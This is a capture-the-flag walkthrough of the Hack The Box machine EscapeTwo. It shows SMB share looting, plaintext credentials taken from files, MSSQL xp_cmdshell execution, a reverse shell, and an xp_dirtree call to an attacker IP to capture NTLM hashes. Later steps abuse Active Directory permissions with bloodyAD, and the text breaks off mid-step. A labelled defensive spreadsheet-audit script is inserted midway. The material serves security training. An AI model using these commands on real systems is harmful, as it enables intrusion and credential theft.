Starting Windows Life From Zero: EscapeTwo

Fly, Violet, on the wings of the roc, like the firebird

We are, having sung again and again, grown stronger


Target IP: 10.129.186.96

Difficulty: Easy

Initial credentials: rose / KxEPkKe6R8su

Topics covered:

Port scanning and service enumeration: identifying the ports characteristic of a domain controller (88, 389, 636) and the key services (MSSQL, SMB).

SMB share misconfiguration: discovering non-default shares and extracting sensitive files.

Sensitive information disclosure: extracting plaintext credentials from an .xlsx (XML) file and an application configuration file (.ini).

MSSQL database compromise: using the sa account to enable xp_cmdshell and run operating-system commands.

Lateral movement: moving laterally through credential reuse and the WinRM protocol.

Domain attack-path analysis: using BloodHound to identify a hidden ACL-based path.

DACL abuse: taking over an AD object through WriteOwner and GenericAll rights.

Shadow Credentials: abusing the msDS-KeyCredentialLink attribute to obtain an NTLM hash.

AD CS certificate services attack (ESC4): using write access on a certificate template (ESC4) to craft a dangerous template and forge a domain administrator certificate.


Nmap full-port scan

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 10.129.186.96 -Pn
Nmap scan report for 10.129.186.96
Host is up (0.13s latency).
Not shown: 65510 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49695/tcp open unknown
49712/tcp open unknown
49728/tcp open unknown
49738/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 760.68 seconds

Nmap detailed service probing

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p53,88,135,139,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49668,49689,49690,49712,49728,49738 -sV -sC -A 10.129.186.96 -Pn
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 00:43 -0500
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 43.48% done; ETC: 00:43 (0:00:10 remaining)
Stats: 0:00:44 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.87% done; ETC: 00:44 (0:00:28 remaining)
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.48% done; ETC: 00:44 (0:00:00 remaining)
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 00:44 (0:00:00 remaining)
Nmap scan report for 10.129.186.96
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-21 05:43:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
| ms-sql-ntlm-info:
| 10.129.186.96:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.129.186.96:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-21T05:28:38
|_Not valid after: 2056-01-21T05:28:38
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49728/tcp open msrpc Microsoft Windows RPC
49738/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-time:
| date: 2026-01-21T05:44:41
|_ start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 165.93 ms 10.10.14.1
2 170.71 ms 10.129.186.96

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.70 seconds

Add the discovered domain names to /etc/hosts

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.186.96 DC01.sequel.htb sequel.htb" >> /etc/hosts

SMB share enumeration

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su' --shares

SMB 10.129.186.96 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.186.96 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.186.96 445 DC01 [*] Enumerated shares
SMB 10.129.186.96 445 DC01 Share Permissions Remark
SMB 10.129.186.96 445 DC01 ----- ----------- ------
SMB 10.129.186.96 445 DC01 Accounting Department READ
SMB 10.129.186.96 445 DC01 ADMIN$ Remote Admin
SMB 10.129.186.96 445 DC01 C$ Default share
SMB 10.129.186.96 445 DC01 IPC$ READ Remote IPC
SMB 10.129.186.96 445 DC01 NETLOGON READ Logon server share
SMB 10.129.186.96 445 DC01 SYSVOL READ Logon server share
SMB 10.129.186.96 445 DC01 Users READ

A non-default share named Users shows up, so let's take a look inside.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient \\\\10.129.186.96\\Users -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Jun 9 09:42:11 2024
.. DR 0 Sun Jun 9 09:42:11 2024
Default DHR 0 Sun Jun 9 07:17:29 2024
desktop.ini AHS 174 Sat Sep 15 03:16:48 2018

6367231 blocks of size 4096. 924175 blocks available
smb: \> get desktop.ini
getting file \desktop.ini of size 174 as desktop.ini (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> cd Default\
smb: \Default\> dir
. DHR 0 Sun Jun 9 07:17:29 2024
.. DHR 0 Sun Jun 9 07:17:29 2024
AppData DH 0 Sat Sep 15 03:19:00 2018
Desktop DR 0 Sat Sep 15 03:19:00 2018
Documents DR 0 Sat Jun 8 21:29:57 2024
Downloads DR 0 Sat Sep 15 03:19:00 2018
Favorites DR 0 Sat Sep 15 03:19:00 2018
Links DR 0 Sat Sep 15 03:19:00 2018
Music DR 0 Sat Sep 15 03:19:00 2018
NTUSER.DAT A 262144 Sat Jun 8 21:29:57 2024
NTUSER.DAT.LOG1 AHS 57344 Sat Sep 15 02:09:26 2018
NTUSER.DAT.LOG2 AHS 0 Sat Sep 15 02:09:26 2018
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Sat Jun 8 21:29:57 2024
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Sat Jun 8 21:29:57 2024
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Sat Jun 8 21:29:57 2024
Pictures DR 0 Sat Sep 15 03:19:00 2018
Saved Games D 0 Sat Sep 15 03:19:00 2018
Videos DR 0 Sat Sep 15 03:19:00 2018

6367231 blocks of size 4096. 924175 blocks available
smb: \Default\>

Nothing worth reading there, so let's list the domain users instead.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su' --users
SMB 10.129.186.96 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.186.96 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.186.96 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.186.96 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.129.186.96 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.129.186.96 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.129.186.96 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.129.186.96 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.129.186.96 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.129.186.96 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.129.186.96 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.129.186.96 445 DC01 ca_svc 2026-01-21 06:02:29 0
SMB 10.129.186.96 445 DC01 [*] Enumerated 9 local users: SEQUEL

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su'
WINRM 10.129.186.96 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.186.96 5985 DC01 [-] sequel.htb\rose:KxEPkKe6R8su

No remote management rights; that seems normal.

Out of ideas, I went back to the SMB share listing and noticed another non-default share, Accounting Department (so why didn't I spot it the first time? Maybe I'm just dense).

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient \\\\10.129.186.96\\Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024

6367231 blocks of size 4096. 926603 blocks available
smb: \>

Note that the space in the share name has to be escaped.

Looking at accounts.xlsx gives us accounts and passwords. I don't know why Microsoft Excel could not open the downloaded file; I could only read the passwords at a lower level.

Permission misconfiguration: when an administrator creates an SMB share with permissions that are too broad (for example, allowing Everyone or Domain Users to read), sensitive data leaks.

Office file structure: modern Office documents (.xlsx, .docx) are essentially ZIP archives made up of several XML files. Even without Office installed, an attacker can unzip the file and read the SharedStrings table or the metadata XML directly, bypassing some application-layer protections or simply obtaining the content outright.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>

This gives oscar's password, 86LxLBMgEWaKUnBG, and an account named sa with the password MSSQLP@ssw0rd!

A reasonable guess is that these are MSSQL credentials.
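Reading sharedStrings.xml alone is lossy: the table is de-duplicated (the file above says count="25" but uniqueCount="24", because "NULL" is stored once and used twice), so rows can only be rebuilt from the sheet's cell references. The following is an added example, not code from the original post: it parses an .xlsx from its XML parts and flags credential-looking columns, which is how a defender would sweep files pulled off an over-permissive share. The sample workbook it builds is constructed with placeholder values.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# SpreadsheetML namespace used by xl/sharedStrings.xml and xl/worksheets/sheetN.xml
NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"

# Header names that mark a column worth flagging when auditing share contents
CREDENTIAL_HEADERS = {"password", "passwd", "pwd", "secret"}


def load_shared_strings(zf):
    """Return the workbook's shared-string table as a list (index -> text)."""
    try:
        data = zf.read("xl/sharedStrings.xml")
    except KeyError:          # workbooks with only inline/numeric cells have no table
        return []
    strings = []
    for si in ET.fromstring(data).findall(NS + "si"):
        # A rich-text cell splits one string across several <r><t> runs; join them.
        strings.append("".join(t.text or "" for t in si.iter(NS + "t")))
    return strings


def load_rows(zf, sheet_path="xl/worksheets/sheet1.xml"):
    """Rebuild the rows of one worksheet, resolving t="s" cells via the shared-string table.

    The table is de-duplicated (count != uniqueCount), so it cannot be read as rows
    by itself: the sheet's <c> cells say which string index lands in which cell.
    """
    shared = load_shared_strings(zf)
    rows = []
    for row in ET.fromstring(zf.read(sheet_path)).iter(NS + "row"):
        cells = []
        for c in row.findall(NS + "c"):
            v = c.find(NS + "v")
            if v is None or v.text is None:
                cells.append("")
            elif c.get("t") == "s":             # shared-string reference
                cells.append(shared[int(v.text)])
            else:                               # number, boolean, or inline value
                cells.append(v.text)
        rows.append(cells)
    return rows


def find_credential_columns(rows):
    """Return (header, filled_cells) for each column whose header looks like a secret."""
    if not rows:
        return []
    hits = []
    for idx, name in enumerate(rows[0]):
        if name.strip().lower() in CREDENTIAL_HEADERS:
            filled = sum(1 for r in rows[1:] if idx < len(r) and r[idx])
            hits.append((name, filled))
    return hits


def audit_xlsx_bytes(data):
    """Parse an .xlsx held in memory and report credential-looking columns."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        rows = load_rows(zf)
    return rows, find_credential_columns(rows)


# --- constructed sample workbook: same column layout as accounts.xlsx, placeholder values ---

def _sst_xml(strings):
    items = "".join(f'<si><t xml:space="preserve">{s}</t></si>' for s in strings)
    return f'<sst xmlns="{NS[1:-1]}" uniqueCount="{len(strings)}">{items}</sst>'


def _sheet_xml(index_rows):
    rows = []
    for r, idxs in enumerate(index_rows, start=1):
        cells = "".join(f'<c r="{chr(65 + i)}{r}" t="s"><v>{s}</v></c>' for i, s in enumerate(idxs))
        rows.append(f'<row r="{r}">{cells}</row>')
    return f'<worksheet xmlns="{NS[1:-1]}"><sheetData>{"".join(rows)}</sheetData></worksheet>'


def build_sample_xlsx():
    strings = ["First Name", "Last Name", "Email", "Username", "Password",
               "NULL", "sa@example.test", "sa", "EXAMPLE-ONLY-P@ss"]
    # The second record reuses shared string 5 ("NULL") for two cells, like the real file did.
    sheet = [[0, 1, 2, 3, 4], [5, 5, 6, 7, 8]]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/sharedStrings.xml", _sst_xml(strings))
        zf.writestr("xl/worksheets/sheet1.xml", _sheet_xml(sheet))
    return buf.getvalue()


if __name__ == "__main__":
    rows, hits = audit_xlsx_bytes(build_sample_xlsx())
    for row in rows:
        print(row)
    print("credential columns:", hits)
```

Point `audit_xlsx_bytes` at the bytes of a real downloaded workbook to get the same row reconstruction on a multi-sheet file, passing each `xl/worksheets/sheetN.xml` path to `load_rows` in turn.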

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.129.186.96
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (sa dbo@master)> whoami
ERROR(DC01\SQLEXPRESS): Line 1: Could not find stored procedure 'whoami'.
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> whoami
ERROR(DC01\SQLEXPRESS): Line 1: Could not find stored procedure 'whoami'.
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell';
name minimum maximum config_value run_value
----------- ------- ------- ------------ ---------
xp_cmdshell 0 1 1 1
SQL (sa dbo@master)>
SQL (sa dbo@master)> SELECT DB_NAME() AS CurrentDatabase;
CurrentDatabase
---------------
master

Connect using MDUT.

Then send a reverse shell back to our host.

────────────────────────────────────────────────────────────────────────────────
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.129.186.96-Microsoft_Windows_Server_2019_Standard-x64-based_PC 😍 Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.129.186.96_Microsoft_Windows_Server_2019_Standard_x64-based_PC/2026_01_21-01_58_25-198.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\Windows\system32> whoami
sequel\sql_svc
PS C:\Windows\system32>

If commands cannot be executed, MSSQL can also be told to connect back to our host so that its NTLM hash can be captured.

SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.14.14\share', 1, 1
subdirectory depth file
------------ ----- ----
┌─[root@htb-6um9kvarqx]─[/home/skyarrow]
└──╼ #responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.3.0

To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.14]
Responder IPv6 [dead:beef:2::100c]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Current Session Variables:
Responder Machine Name [WIN-ZAVFQCGNLOR]
Responder Domain Name [3TX9.LOCAL]
Responder DCE-RPC Port [49628]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:fcf64b31c2a3898c...
[+] Exiting...

Next, gather sensitive data.

PS C:\Windows\system32> cd C:\SQL2019\
PS C:\SQL2019> cd ExpressAdv_ENU
PS C:\SQL2019\ExpressAdv_ENU> dir


Directory: C:\SQL2019\ExpressAdv_ENU


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/8/2024 3:07 PM 1033_ENU_LP
d----- 6/8/2024 3:07 PM redist
d----- 6/8/2024 3:07 PM resources
d----- 6/8/2024 3:07 PM x64
-a---- 9/24/2019 10:03 PM 45 AUTORUN.INF
-a---- 9/24/2019 10:03 PM 788 MEDIAINFO.XML
-a---- 6/8/2024 3:07 PM 16 PackageId.dat
-a---- 9/24/2019 10:03 PM 142944 SETUP.EXE
-a---- 9/24/2019 10:03 PM 486 SETUP.EXE.CONFIG
-a---- 6/8/2024 3:07 PM 717 sql-Configuration.INI
-a---- 9/24/2019 10:03 PM 249448 SQLSETUPBOOTSTRAPPER.DLL


PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
PS C:\SQL2019\ExpressAdv_ENU>

Another password turns up.

After password spraying, this password logs in as ryan, who also has WinRM access.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.186.96 -u 'ryan' -p 'WqSZAF6CysDQbGb3'
[*] Initializing MSSQL protocol database
WINRM 10.129.186.96 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.186.96 5985 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)
*Evil-WinRM* PS C:\Users\ryan\Desktop> type user.txt
64d73a79bf4dcff891c4564ca29a1a46
*Evil-WinRM* PS C:\Users\ryan\Desktop>
*Evil-WinRM* PS C:\Users\ryan\Desktop>

Upload SharpHound, collect the data, and download the results.

*Evil-WinRM* PS C:\Users\ryan\Desktop> upload SharpHound.exe

Info: Uploading /home/kali/Desktop/SharpHound.exe to C:\Users\ryan\Desktop\SharpHound.exe

Data: 1713492 bytes of 1713492 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Desktop> .\SharpHound.exe -c All
2026-01-20T23:07:52.0226894-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-01-20T23:07:52.2258431-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-20T23:07:52.2414344-08:00|INFORMATION|Initializing SharpHound at 11:07 PM on 1/20/2026
2026-01-20T23:07:52.2883092-08:00|INFORMATION|Resolved current domain to sequel.htb
2026-01-20T23:07:52.4289377-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-20T23:07:52.5227121-08:00|INFORMATION|Beginning LDAP search for sequel.htb
2026-01-20T23:07:52.6164364-08:00|INFORMATION|Beginning LDAP search for sequel.htb Configuration NC
2026-01-20T23:07:52.6476894-08:00|INFORMATION|Producer has finished, closing LDAP channel
2026-01-20T23:07:52.6476894-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-01-20T23:07:52.6633111-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2026-01-20T23:07:52.6633111-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2026-01-20T23:07:53.0070972-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2026-01-20T23:08:00.3351926-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-01-20T23:08:00.3664322-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-01-20T23:08:00.6321599-08:00|INFORMATION|Status: 348 objects finished (+348 43.5)/s -- Using 41 MB RAM
2026-01-20T23:08:00.6321599-08:00|INFORMATION|Enumeration finished in 00:00:08.1214295
2026-01-20T23:08:00.8682785-08:00|INFORMATION|Saving cache with stats: 18 ID to type mappings.
1 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2026-01-20T23:08:00.8978829-08:00|INFORMATION|SharpHound Enumeration Completed at 11:08 PM on 1/20/2026! Happy Graphing!
*Evil-WinRM* PS C:\Users\ryan\Desktop>
*Evil-WinRM* PS C:\Users\ryan\Desktop> download 20260120230753_BloodHound.zip

Info: Downloading C:\Users\ryan\Desktop\20260120230753_BloodHound.zip to 20260120230753_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\ryan\Desktop>

Analysing the data in BloodHound shows that ryan has WriteOwner over ca_svc,

and that ca_svc is a certificate publisher.

So the whole attack chain is ryan -> ca_svc -> malicious certificate issuance -> domain controller.

ryan has WriteOwner over the user ca_svc.

ca_svc is a member of the Cert Publishers group.

The Cert Publishers group has write permissions on the DunderMifflinAuthentication certificate template.

That template can be used for an AD CS ESC4 privilege escalation.

First, get hold of ca_svc.

Since we hold WriteOwner, we can change the owner of ca_svc to ourselves.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# # Syntax: bloodyAD --host <DC_IP> -d <domain> -u ryan -p <password> set owner <target user> <new owner>
bloodyAD --host 10.129.186.96 -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

Then modify the ACL to grant ourselves GenericAll.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD --host 10.129.186.96 -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll ca_svc ryan
[+] ryan has now GenericAll on ca_svc

Alternatively, this works as well:

